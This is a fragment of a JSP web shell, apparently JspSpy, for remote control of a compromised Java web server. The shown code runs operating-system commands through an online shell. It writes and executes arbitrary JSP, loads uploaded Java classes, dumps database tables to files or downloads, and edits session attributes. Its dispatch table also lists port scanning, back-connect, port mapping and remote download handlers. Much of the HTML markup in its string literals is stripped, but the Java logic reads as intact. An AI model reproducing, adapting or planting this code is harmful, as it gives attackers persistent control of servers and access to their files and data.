OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start(); Thread.sleep(1000 * 60 * 60 * 24); } else if (type.equals("ecmd")) { Object o = JSession.getAttribute(SHELL_ONLINE); String cmd = request.getParameter("cmd"); if (Util.isEmpty(cmd)) return; if (o == null) return; OnLineProcess olp = (OnLineProcess)o; olp.setCmd(cmd); } else { Object o = JSession.getAttribute(SHELL_ONLINE); if (o == null) return; OnLineProcess olp = (OnLineProcess)o; olp.stop(); } } catch (Exception e) { throw e; } } } private static class EnterInvoker extends DefaultInvoker { public boolean doBefore(){return false;} public boolean doAfter(){return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ PrintWriter out = response.getWriter(); String type = request.getParameter("type"); if (!Util.isEmpty(type)) { JSession.removeAttribute(ENTER); JSession.removeAttribute(ENTER_MSG); JSession.removeAttribute(ENTER_CURRENT_DIR); JSession.setAttribute(MSG,"Exit File Success ! "); } else { String f = request.getParameter("filepath"); if (Util.isEmpty(f)) return; JSession.setAttribute(ENTER,f); JSession.setAttribute(ENTER_MSG,"You Are In File \""+f+"\" Now ! Exit "); } response.sendRedirect(SHELL_NAME); } } private static class VExport2FileInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ PrintWriter out = response.getWriter(); String type = request.getParameter("type"); String sql = request.getParameter("sql"); String table = request.getParameter("table"); if (Util.isEmpty(sql) && Util.isEmpty(table)) { JSession.setAttribute(SESSION_O,"vConn"); response.sendRedirect(SHELL_NAME); return; } out.println("
"+ ""+ " "+ " "+ " "+ "
"+ " "+ " "+ " "+ " "+ "

Export To File »

"+ " "+ "
Export \""+(Util.isEmpty(sql) ? table : sql.replaceAll("\"","""))+"\" To File : "+ " "+ "

"+BACK_HREF+"
"+ "
"); } } private static class ExportInvoker extends DefaultInvoker { public boolean doBefore(){return false;} public boolean doAfter(){return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ String type = request.getParameter("type"); String filepath = request.getParameter("filepath"); String encode = request.getParameter("encode"); String sql = null; DBOperator dbo = null; dbo = (DBOperator)JSession.getAttribute(DBO); if (Util.isEmpty(type)) { //table export String tb = request.getParameter("table"); if (Util.isEmpty(tb)) return; String s = dbo.getConn().getMetaData().getIdentifierQuoteString(); sql = "select * from "+s+tb+s; } else if (type.equals("queryexp")) { //query export sql = request.getParameter("sql"); if (Util.isEmpty(sql)) { JSession.setAttribute(SESSION_O,"vConn"); response.sendRedirect(SHELL_NAME); return; } } Object o = dbo.execute(sql); ByteArrayOutputStream bout = new ByteArrayOutputStream(); byte[] rowSep = "\r\n".getBytes(); if (o instanceof ResultSet) { ResultSet rs = (ResultSet)o; ResultSetMetaData meta = rs.getMetaData(); int count = meta.getColumnCount(); for (int i =1;i<=count;i++) { String colName = meta.getColumnName(i)+"\t"; byte[] b = null; if (Util.isEmpty(encode)) b = colName.getBytes(); else b = colName.getBytes(encode); bout.write(b,0,b.length); } bout.write(rowSep,0,rowSep.length); while (rs.next()) { for (int i =1;i<=count;i++) { String v = null; try { v = rs.getString(i); } catch (SQLException ex) { v = "<>"; } v += "\t"; byte[] b = null; if (Util.isEmpty(encode)) b = v.getBytes(); else b = v.getBytes(encode); bout.write(b,0,b.length); } bout.write(rowSep,0,rowSep.length); } rs.close(); ByteArrayInputStream input = new ByteArrayInputStream(bout.toByteArray()); BufferedOutputStream output = null; if (!Util.isEmpty(filepath)) { //export2file output = new BufferedOutputStream(new FileOutputStream(new File(filepath))); } else { //download. response.setHeader("Content-Disposition","attachment;filename=DataExport.txt"); output = new BufferedOutputStream(response.getOutputStream()); } byte[] data = new byte[1024]; int len = input.read(data); while (len != -1) { output.write(data,0,len); len = input.read(data); } bout.close(); input.close(); output.close(); if (!Util.isEmpty(filepath)) { JSession.setAttribute(MSG,"Export To File Success !"); response.sendRedirect(SHELL_NAME); } } } } private static class EvalInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ String type = request.getParameter("type"); PrintWriter out = response.getWriter(); Object msg = JSession.getAttribute(MSG); if (msg != null) { Util.outMsg(out,(String)msg); JSession.removeAttribute(MSG); } if (Util.isEmpty(type)) { out.println(""+ " "+ " "+ " "+ "

Eval Java Code »

"+ "
"+ "

"+ "

"+ "UpLoad a Class File : "); Util.outMsg(out,"
"+
"public class SpyEval{\r\n"+
"    static {\r\n"+
"        //Your Code Here.\r\n"+
"    }\r\n"+
"}\r\n"+
"
","left"); out.println("

"+ "

Jsp Eval :
"+ " "+ " "+ "
"+ "
"+ "

"+ "
"); } else if (type.equals("jsp")){ String jspc = request.getParameter("jspc"); if (Util.isEmpty(jspc)) return; File f = new File(SHELL_DIR,"evaltmpninty.jsp"); BufferedWriter writer = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f),"utf-8")); writer.write(jspc,0,jspc.length()); writer.flush(); writer.close(); out.println(""+ " "+ "

Jsp Eval Result »

"); out.println("
"); request.getRequestDispatcher("evaltmpninty.jsp").include(request,response); out.println("
"); f.delete(); } } } private static class EvalUploadInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ ByteArrayOutputStream stream = new ByteArrayOutputStream(); UploadBean upload = new UploadBean(); upload.setTargetOutput(stream); upload.parseRequest(request); if (stream.toByteArray().length == 2) { JSession.setAttribute(MSG,"Please Upload Your Class File ! "); ((Invoker)ins.get("ev")).invoke(request,response,JSession); return; } SpyClassLoader loader = new SpyClassLoader(); try { Class c = loader.defineClass(null,stream.toByteArray()); c.newInstance(); }catch(Exception e) { } stream.close(); JSession.setAttribute(MSG,"Eval Java Class Done ! "); ((Invoker)ins.get("ev")).invoke(request,response,JSession); } } private static class VOtherInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); Object msg = JSession.getAttribute(MSG); if (msg != null) { Util.outMsg(out,(String)msg); JSession.removeAttribute(MSG); } out.println(""+ " "+ " "+ " "+ "

Session Manager>>


"+ "
"+ "
    "); Enumeration en = JSession.getAttributeNames(); while (en.hasMoreElements()) { Object o = en.nextElement(); if (o.toString().equals(MSG)) continue; out.println("
  • "+o.toString()+" "); out.println(" "); out.println(""); out.println(""); out.println("
  • "); } out.println("
  • "+ "New Session Attribute"+ "name : value : "+ "
"); } catch (Exception e) { throw e ; } } } //Session Manager private static class SmInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { String type = request.getParameter("type"); PrintWriter out = response.getWriter(); if (type.equals("update")) { String name = request.getParameter("name"); String value = request.getParameter("value"); JSession.setAttribute(name,value); JSession.setAttribute(MSG,"Update/Add Attribute Success !"); } else if (type.equals("delete")) { String name = request.getParameter("name"); JSession.removeAttribute(name); JSession.setAttribute(MSG,"Remove Attribute Success !"); } ((Invoker)ins.get("vother")).invoke(request,response,JSession); } catch (Exception e) { throw e ; } } } static{ ins.put("script",new ScriptInvoker()); ins.put("before",new BeforeInvoker()); ins.put("after",new AfterInvoker()); ins.put("deleteBatch",new DeleteBatchInvoker()); ins.put("clipboard",new ClipBoardInvoker()); ins.put("vPortScan",new VPortScanInvoker()); ins.put("portScan",new PortScanInvoker()); ins.put("vConn",new VConnInvoker()); ins.put("dbc",new DbcInvoker()); ins.put("executesql",new ExecuteSQLInvoker()); ins.put("vLogin",new VLoginInvoker()); ins.put("login",new LoginInvoker()); ins.put("filelist", new FileListInvoker()); ins.put("logout",new LogoutInvoker()); ins.put("upload",new UploadInvoker()); ins.put("copy",new CopyInvoker()); ins.put("bottom",new BottomInvoker()); ins.put("vCreateFile",new VCreateFileInvoker()); ins.put("vEdit",new VEditInvoker()); ins.put("createFile",new CreateFileInvoker()); ins.put("vEditProperty",new VEditPropertyInvoker()); ins.put("editProperty",new EditPropertyInvoker()); ins.put("vs",new VsInvoker()); ins.put("shell",new ShellInvoker()); ins.put("down",new DownInvoker()); ins.put("vd",new VdInvoker()); ins.put("downRemote",new DownRemoteInvoker()); ins.put("index",new IndexInvoker()); ins.put("mkdir",new MkDirInvoker()); ins.put("move",new MoveInvoker()); ins.put("removedir",new RemoveDirInvoker()); ins.put("packBatch",new PackBatchInvoker()); ins.put("pack",new PackInvoker()); ins.put("unpack",new UnPackInvoker()); ins.put("vmp",new VmpInvoker()); ins.put("vbc",new VbcInvoker()); ins.put("backConnect",new BackConnectInvoker()); ins.put("jspEnv",new JspEnvInvoker()); ins.put("smp",new SmpInvoker()); ins.put("mapPort",new MapPortInvoker()); ins.put("top",new TopInvoker()); ins.put("vso",new VOnLineShellInvoker()); ins.put("online",new OnLineInvoker()); ins.put("enter",new EnterInvoker()); ins.put("export",new ExportInvoker()); ins.put("ev",new EvalInvoker()); ins.put("eu",new EvalUploadInvoker()); ins.put("vother",new VOtherInvoker()); ins.put("sm",new SmInvoker()); ins.put("vExport",new VExport2FileInvoker()); ins.put("vPack",new VPackConfigInvoker()); ins.put("reflect",new ReflectInvoker()); ins.put("portBack",new PortBackInvoker()); } %> <% try { String o = request.getParameter("o"); if (Util.isEmpty(o)) { if (session.getAttribute(SESSION_O) == null) o = "index"; else { o = session.getAttribute(SESSION_O).toString(); session.removeAttribute(SESSION_O); } } Object obj = ins.get(o); if (obj == null) { response.sendRedirect(SHELL_NAME); } else { Invoker in = (Invoker)obj; if (in.doBefore()) { String path = request.getParameter("folder"); if (!Util.isEmpty(path) && session.getAttribute(ENTER) == null) session.setAttribute(CURRENT_DIR,path); ((Invoker)ins.get("before")).invoke(request,response,session); ((Invoker)ins.get("script")).invoke(request,response,session); ((Invoker)ins.get("top")).invoke(request,response,session); } in.invoke(request,response,session); if (!in.doAfter()) { return; }else{ ((Invoker)ins.get("bottom")).invoke(request,response,session); ((Invoker)ins.get("after")).invoke(request,response,session); } } } catch (Exception e) { Object msg = session.getAttribute(MSG); if (msg != null) { Util.outMsg(out,(String)msg); session.removeAttribute(MSG); } if (e.toString().indexOf("ClassCastException") != -1) { Util.outMsg(out,MODIFIED_ERROR + BACK_HREF); } ByteArrayOutputStream bout = new ByteArrayOutputStream(); e.printStackTrace(new PrintStream(bout)); session.setAttribute(CURRENT_DIR,SHELL_DIR); Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replaceAll("\n","
"),"left"); bout.close(); out.flush(); ((Invoker)ins.get("bottom")).invoke(request,response,session); ((Invoker)ins.get("after")).invoke(request,response,session); } %>